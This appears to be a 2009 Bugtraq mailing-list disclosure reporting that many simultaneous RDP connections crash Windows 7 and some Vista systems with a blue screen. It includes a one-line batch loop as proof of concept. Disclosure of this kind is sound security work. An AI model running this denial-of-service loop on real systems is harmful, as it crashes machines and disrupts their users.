[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Multiple RDP Connections BSOD DOS
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: Multiple RDP Connections BSOD DOS
- From: Tim Medin <timmedin@xxxxxxxxxxxxxxxxx>
- Date: Tue, 8 Sep 2009 13:35:41 -0500
Creating multiple RDP connection at the same time causes Windows to
Blue Screen. Here is the Proof of Concept code.
for /L %i in (1,1,20) do mstsc /v:127.0.0.%i
It does work on Windows 7 and some Vista installations.
-Tim Medin